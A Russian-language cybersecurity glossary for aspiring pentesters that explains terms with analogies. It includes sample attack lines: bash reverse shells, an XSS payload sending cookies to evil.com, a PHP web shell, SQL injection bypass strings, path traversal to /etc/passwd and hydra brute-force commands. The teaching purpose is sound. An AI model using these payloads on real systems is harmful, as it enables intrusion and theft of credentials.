📌 Шпаргалка #01

📖 Глоссарий кибербезопасности

✍️ pentestudy 📅 26.03.2026

📌 Зачем этот глоссарий

В кибербезопасности много терминов на английском. Без их понимания невозможно читать отчёты, документацию, CVE-описания и общаться с коллегами. Здесь — самые важные термины с объяснением на пальцах.


🚀 Атака и эксплуатация

Exploit (эксплойт)

Программа или техника которая использует конкретную уязвимость. Это "отмычка" под конкретный замок.

Аналогия: замок с дефектом. Эксплойт — инструмент который знает про этот дефект и открывает замок без ключа.

# Эксплойт для бэкдора в vsftpd 2.3.4
python3 exploit_vsftpd234.py --target 10.0.0.1

Бывают: Remote (по сети), Local (нужен доступ к системе), Web (через HTTP).

Payload (полезная нагрузка)

Код который выполняется после успешной эксплуатации. "Начинка" атаки — то ради чего всё затевалось.

Аналогия: ракета = эксплойт (доставка) + payload (боеголовка). Одна ракета — разные боеголовки.

# Reverse shell — открывает удалённый доступ
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
 
# XSS — крадёт cookies
<script>fetch('https://evil.com/?c='+document.cookie)</script>
 
# SQL injection — обходит авторизацию
' OR 1=1 --

Vulnerability (уязвимость)

Слабое место в системе. Баг, ошибка конфигурации, устаревшее ПО.

Аналогия: дырка в заборе. Сама по себе не опасна, но через неё можно пролезть.

Примеры: открытый FTP без пароля, SQL-инъекция в форме логина, Apache с известным багом, SSH с паролем "admin".

Zero-Day (нулевой день)

Уязвимость о которой разработчик ещё не знает. Нет патча, нет защиты. У разработчика было 0 дней на исправление.

Аналогия: дырка в заборе о которой не знает даже хозяин дома.

Zero-day эксплойты стоят на чёрном рынке от $50,000 до $2,500,000.

CVE (Common Vulnerabilities and Exposures)

Стандартный ID уязвимости. Единая нумерация чтобы все говорили об одной дыре.

Формат: CVE-ГОД-НОМЕР

Примеры: CVE-2021-41773 (Apache Path Traversal), CVE-2017-0144 (EternalBlue/WannaCry), CVE-2014-0160 (Heartbleed).

CVSS (Common Vulnerability Scoring System)

Оценка серьёзности уязвимости от 0 до 10. Критическая = 9.0-10.0 (полный контроль). Высокая = 7.0-8.9. Средняя = 4.0-6.9. Низкая = 0.1-3.9.

Пентестеру интересны 7.0+ в первую очередь.

POC (Proof of Concept)

Рабочий пример эксплуатации. Не полноценная атака, а доказательство что дыра реальна.

Аналогия: ты не ломаешь дверь, а показываешь видео как она открывается без ключа.

В пентесте POC — это то что ты прикладываешь к отчёту: "вот доказательство, уязвимость работает".


🐚 Доступ и контроль

Shell (шелл)

Командная строка на удалённой машине. Получить шелл = получить возможность выполнять команды на чужом компьютере.

Аналогия: ты сидишь за клавиатурой чужого компьютера и можешь печатать команды.

# Ты получил шелл если видишь что-то вроде:
root@target:~#
www-data@target:$

Reverse Shell (обратный шелл)

Целевая машина сама подключается к тебе. Обходит фаервол — потому что исходящие соединения обычно не блокируются.

Аналогия: вместо того чтобы ломиться в дверь (которая закрыта на замок), ты просишь человека внутри позвонить тебе.

# На твоей машине — слушаешь
nc -lvnp 4444
 
# На цели — подключается к тебе
bash -i >& /dev/tcp/ТВОЙ_IP/4444 0>&1

Bind Shell (привязанный шелл)

Цель открывает порт и ждёт твоего подключения. Противоположность reverse shell.

Аналогия: цель оставляет дверь открытой, ты заходишь когда хочешь.

Минус: фаервол обычно блокирует входящие соединения. Поэтому reverse shell используют чаще.

Backdoor (бэкдор)

Скрытый вход в систему который обходит нормальную аутентификацию. Может быть оставлен хакером или даже встроен в ПО.

Аналогия: тайная дверь в стене за книжным шкафом.

Примеры:
- vsftpd 2.3.4 — бэкдор прямо в исходном коде
- Web shell — PHP-файл на сервере для выполнения команд
- SSH-ключ атакующего добавлен в authorized_keys

Web Shell

PHP/ASP/JSP файл загруженный на веб-сервер. Через браузер можно выполнять команды на сервере.

<?php system($_GET['cmd']); ?>

Использование: http://target.com/shell.php?cmd=whoami

Privilege Escalation (повышение привилегий)

Получение большего уровня доступа чем есть. Зашёл как обычный пользователь → стал root/admin.

Аналогия: ты зашёл в здание как посетитель, а потом нашёл ключ от серверной.

Два типа:

  • Vertical — user → root (вверх по уровню)
  • Horizontal — user1 → user2 (тот же уровень, другой аккаунт)

Lateral Movement (горизонтальное перемещение)

Перемещение между машинами в сети после первоначального взлома. Взломал один компьютер → через него проник на другие.

Аналогия: зашёл в одну комнату → через неё перешёл в соседнюю → потом в следующую.

Persistence (закрепление)

Обеспечение доступа после перезагрузки или обнаружения. Бэкдор, cron-задача, автозапуск — всё что позволяет вернуться.

Аналогия: ты не только проник в здание, но и сделал себе копию ключа.


🔍 Разведка

Reconnaissance / Recon (разведка)

Сбор информации о цели перед атакой. Первый этап любого пентеста.

Passive recon — без контакта с целью. Google, WHOIS, социальные сети, публичные DNS-записи.

Active recon — прямой контакт. Nmap сканирование, обращение к серверу, проверка портов.

OSINT (Open Source Intelligence)

Разведка по открытым источникам. Всё что можно найти без взаимодействия с целью.

Аналогия: детектив изучает человека по его соцсетям, публичным документам и новостям, даже не звоня ему.

Источники: Google, LinkedIn, GitHub, Shodan, WHOIS, утекшие базы данных.

Enumeration (перечисление)

Активный сбор детальной информации. После того как нашёл открытые порты — узнаёшь версии, пользователей, шары, домены.

# Перечисление SMB-шар
smbclient -L //10.0.0.1
 
# Перечисление пользователей
enum4linux 10.0.0.1
 
# Перечисление DNS
dig axfr example.com @ns1.example.com

Footprinting

Создание "отпечатка" цели — какие технологии используются, какая инфраструктура, какие точки входа.

Attack Surface (поверхность атаки)

Всё что доступно атакующему. Каждый открытый порт, каждый API-эндпоинт, каждая форма ввода — часть поверхности атаки.

Аналогия: количество окон и дверей в здании. Чем больше — тем больше способов проникнуть.


🛡 Защита

Firewall (фаервол)

Фильтрует сетевой трафик по правилам. Решает что пропустить, а что заблокировать.

Аналогия: охранник на входе со списком кто может войти.

Stateless — проверяет каждый пакет отдельно. Stateful — отслеживает соединения (умнее).

IDS (Intrusion Detection System)

Обнаруживает подозрительную активность и алертит. Не блокирует — только сообщает.

Аналогия: сигнализация в доме. Срабатывает и шумит, но дверь не закрывает.

IPS (Intrusion Prevention System)

IDS + блокировка. Обнаруживает и автоматически останавливает атаку.

Аналогия: сигнализация которая ещё и запирает двери.

WAF (Web Application Firewall)

Фаервол специально для веб-приложений. Фильтрует HTTP-запросы, блокирует SQL-инъекции, XSS, path traversal.

Запрос: GET /page?id=' OR 1=1 --
WAF: ЗАБЛОКИРОВАНО (SQL injection pattern)

Популярные: Cloudflare WAF, ModSecurity, AWS WAF.

Honeypot (ловушка)

Фейковая система которая выглядит как настоящая цель. Привлекает атакующих чтобы изучить их методы.

Аналогия: поддельный сейф в банке. Грабитель тратит время на него, пока настоящий в другом месте.

SIEM (Security Information and Event Management)

Система которая собирает логи со всех устройств в сети и анализирует их. Находит аномалии и корреляции.

Аналогия: центр видеонаблюдения с записями со всех камер здания.

Примеры: Splunk, ELK Stack, QRadar.


🎯 Типы атак

Brute Force (перебор)

Перебор всех возможных паролей пока не найдёшь правильный.

hydra -l admin -P passwords.txt 10.0.0.1 ssh

Аналогия: пробовать каждый ключ на связке пока один не подойдёт.

Dictionary Attack (словарная атака)

Перебор паролей из заранее составленного списка (словаря). Быстрее чем полный перебор.

rockyou.txt — 14 миллионов паролей
password
123456
admin
qwerty
...

Phishing (фишинг)

Обман жертвы чтобы та сама отдала пароль или кликнула на вредоносную ссылку.

Аналогия: поддельное письмо от "банка" с просьбой "подтвердить данные".

Social Engineering (социальная инженерия)

Манипуляция людьми для получения доступа. Phishing — один из видов. Также: звонки, личные визиты, притворство.

Аналогия: вместо взлома двери — убедить охранника что ты "из IT-отдела".

Man-in-the-Middle / MITM (человек посередине)

Перехват трафика между двумя сторонами. Атакующий читает и может изменять данные.

Аналогия: почтальон который вскрывает письма, читает их и заклеивает обратно.

DoS / DDoS (отказ в обслуживании)

Перегрузка сервера запросами чтобы он перестал работать. DDoS — то же самое но с тысяч компьютеров одновременно.

Аналогия: 10,000 человек одновременно звонят на одну телефонную линию — настоящий звонок не проходит.

SQL Injection (SQL-инъекция)

Внедрение SQL-кода через формы ввода. Позволяет читать/изменять базу данных.

Логин: admin' OR 1=1 --
Пароль: что_угодно
 
Сервер выполняет:
SELECT * FROM users WHERE login='admin' OR 1=1 --' AND pass='...'
→ условие всегда истинно → доступ получен

XSS (Cross-Site Scripting)

Внедрение JavaScript-кода в веб-страницу. Код выполнится в браузере каждого кто откроет страницу.

// Stored XSS — сохраняется на сервере
<script>fetch('https://evil.com/?c='+document.cookie)</script>
 
// Reflected XSS — в URL
https://site.com/search?q=<script>alert(1)</script>

Path Traversal (обход пути)

Чтение файлов за пределами разрешённой директории через ../.

https://site.com/page?file=../../../../etc/passwd

RCE (Remote Code Execution)

Выполнение произвольного кода на удалённом сервере. Самый опасный тип уязвимости — полный контроль над машиной.

LFI / RFI (Local/Remote File Inclusion)

LFI — чтение локальных файлов сервера через уязвимость. RFI — подключение внешнего файла (с сервера атакующего) и его выполнение.

IDOR (Insecure Direct Object Reference)

Доступ к чужим данным через изменение ID в запросе.

https://site.com/profile?id=123   ← твой профиль
https://site.com/profile?id=124   ← чужой профиль (если нет проверки)

🔧 Инструменты

Metasploit

Главный фреймворк для эксплуатации. Содержит тысячи эксплойтов и payload'ов. Автоматизирует весь процесс: от поиска уязвимости до получения шелла.

Аналогия: швейцарский нож пентестера. Всё в одном.

Burp Suite

Прокси для перехвата и модификации HTTP-запросов. Основной инструмент для тестирования веб-приложений.

Аналогия: прозрачное стекло между браузером и сервером — видишь каждый запрос и можешь его изменить.

Nmap

Сканер портов и сервисов. Определяет что открыто, какие версии, какая ОС. Первый инструмент в любом пентесте.

Nessus

Автоматический сканер уязвимостей. Проверяет тысячи CVE за один скан.

Wireshark

Анализатор сетевого трафика. Показывает каждый пакет в сети. Используется для MITM-анализа, отладки и разведки.

Hashcat / John the Ripper

Инструменты для взлома хешей паролей. Hashcat использует GPU и работает намного быстрее.

Hydra

Брутфорсер для сетевых сервисов: SSH, FTP, HTTP, SMB, RDP и десятков других.

hydra -l admin -P rockyou.txt 10.0.0.1 ssh

Gobuster / Dirb / Ffuf

Перебор директорий и файлов на веб-сервере. Находит скрытые страницы: /admin, /backup, /api, .git.

gobuster dir -u http://10.0.0.1 -w /usr/share/wordlists/dirb/common.txt

Netcat (nc)

"Швейцарский нож" для работы с сетью. Слушает порты, подключается к ним, передаёт данные. Часто используется для ловли reverse shell.

# Слушать порт
nc -lvnp 4444

SearchSploit

Офлайн-поиск эксплойтов в базе Exploit-DB. Встроен в Kali Linux.

searchsploit apache 2.4.49

🏗 Методология

Kill Chain (цепочка атаки)

Этапы атаки от разведки до цели:

  1. Reconnaissance — разведка
  2. Weaponization — подготовка эксплойта
  3. Delivery — доставка (фишинг, эксплойт)
  4. Exploitation — эксплуатация уязвимости
  5. Installation — установка бэкдора
  6. Command & Control — управление через C2-сервер
  7. Actions on Objectives — достижение цели (кража данных, шифрование)

Pentesting Phases (этапы пентеста)

  1. Recon — сбор информации
  2. Scanning — сканирование портов и сервисов
  3. Gaining Access — эксплуатация и получение доступа
  4. Maintaining Access — закрепление (persistence)
  5. Covering Tracks — заметание следов
  6. Reporting — написание отчёта

Red Team / Blue Team / Purple Team

Red Team — атакующие. Имитируют хакеров, ищут способы проникнуть.

Blue Team — защитники. Обнаруживают и останавливают атаки.

Purple Team — совместная работа красных и синих для максимальной эффективности.

CTF (Capture The Flag)

Соревнование по хакингу. Нужно найти скрытый "флаг" (обычно строку текста) взломав систему или решив задачу.

Аналогия: квест-рум для хакеров. Лучший способ учиться.

Платформы: HackTheBox, TryHackMe, PicoCTF, VulnHub.

Bug Bounty (баг-баунти)

Компания платит деньги за найденные уязвимости в её продуктах. Легальный хакинг за вознаграждение.

Платформы: HackerOne, Bugcrowd, Intigriti.


🔐 Криптография и аутентификация

Hash (хеш)

Односторонняя функция — превращает данные в строку фиксированной длины. Невозможно восстановить исходные данные из хеша.

MD5:    5d41402abc4b2a76b9719d911017c592
SHA256: 2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824

Используется для хранения паролей. Сервер не хранит пароль — хранит его хеш.

Salt (соль)

Случайная строка добавленная к паролю перед хешированием. Защищает от радужных таблиц.

Без соли: hash("password") → одинаковый хеш у всех
С солью:  hash("password" + "x7f2k") → уникальный хеш

Encryption (шифрование)

Двусторонняя функция — данные можно зашифровать и расшифровать обратно (с ключом).

Симметричное (AES) — один ключ для шифрования и расшифровки. Асимметричное (RSA) — пара ключей: публичный + приватный.

MFA / 2FA (многофакторная аутентификация)

Проверка личности несколькими способами: пароль + SMS-код, пароль + приложение-аутентификатор.

Даже если пароль украден — без второго фактора не войдёшь.


🌐 Сетевые термины

Port (порт)

Логический адрес для сетевого сервиса. Каждый сервис слушает свой порт.

22   — SSH
80   — HTTP
443  — HTTPS
21   — FTP
445  — SMB
3306 — MySQL
3389 — RDP

Protocol (протокол)

Набор правил общения между устройствами. TCP, UDP, HTTP, DNS, SSH — всё это протоколы.

Proxy (прокси)

Посредник между тобой и целью. Твой запрос идёт через прокси — цель видит IP прокси, не твой.

VPN (Virtual Private Network)

Зашифрованный туннель между тобой и сервером. Весь трафик идёт через него.

Pivoting (пивотинг)

Использование взломанной машины как точки для атаки на другие машины в сети. Ты не можешь достучаться до внутренней сети напрямую — но взломанная машина может.

Аналогия: ты не дотягиваешься до полки → встаёшь на стул → дотягиваешься.

C2 / C&C (Command and Control)

Сервер через который атакующий управляет заражёнными машинами. Бэкдоры подключаются к C2 и ждут команд.


📜 Стандарты и фреймворки

OWASP Top 10

Список 10 самых критичных уязвимостей веб-приложений. Обновляется раз в несколько лет. Пентестер должен знать наизусть.

MITRE ATT&CK

База знаний о техниках атакующих. Описывает ЧТО атакующие делают на каждом этапе. Используется для построения защиты.

NIST

Национальный институт стандартов и технологий США. Публикует стандарты безопасности и фреймворк управления рисками.

PTES (Penetration Testing Execution Standard)

Стандарт проведения пентеста. Описывает этапы, методы, отчётность.

Содержание
📌 Зачем этот глоссарий 🚀 Атака и эксплуатация Exploit (эксплойт) Payload (полезная нагрузка) Vulnerability (уязвимость) Zero-Day (нулевой день) CVE (Common Vulnerabilities and Exposures) CVSS (Common Vulnerability Scoring System) POC (Proof of Concept) 🐚 Доступ и контроль Shell (шелл) Reverse Shell (обратный шелл) Bind Shell (привязанный шелл) Backdoor (бэкдор) Web Shell Privilege Escalation (повышение привилегий) Lateral Movement (горизонтальное перемещение) Persistence (закрепление) 🔍 Разведка Reconnaissance / Recon (разведка) OSINT (Open Source Intelligence) Enumeration (перечисление) Footprinting Attack Surface (поверхность атаки) 🛡 Защита Firewall (фаервол) IDS (Intrusion Detection System) IPS (Intrusion Prevention System) WAF (Web Application Firewall) Honeypot (ловушка) SIEM (Security Information and Event Management) 🎯 Типы атак Brute Force (перебор) Dictionary Attack (словарная атака) Phishing (фишинг) Social Engineering (социальная инженерия) Man-in-the-Middle / MITM (человек посередине) DoS / DDoS (отказ в обслуживании) SQL Injection (SQL-инъекция) XSS (Cross-Site Scripting) Path Traversal (обход пути) RCE (Remote Code Execution) LFI / RFI (Local/Remote File Inclusion) IDOR (Insecure Direct Object Reference) 🔧 Инструменты Metasploit Burp Suite Nmap Nessus Wireshark Hashcat / John the Ripper Hydra Gobuster / Dirb / Ffuf Netcat (nc) SearchSploit 🏗 Методология Kill Chain (цепочка атаки) Pentesting Phases (этапы пентеста) Red Team / Blue Team / Purple Team CTF (Capture The Flag) Bug Bounty (баг-баунти) 🔐 Криптография и аутентификация Hash (хеш) Salt (соль) Encryption (шифрование) MFA / 2FA (многофакторная аутентификация) 🌐 Сетевые термины Port (порт) Protocol (протокол) Proxy (прокси) VPN (Virtual Private Network) Pivoting (пивотинг) C2 / C&amp;C (Command and Control) 📜 Стандарты и фреймворки OWASP Top 10 MITRE ATT&amp;CK NIST PTES (Penetration Testing Execution Standard)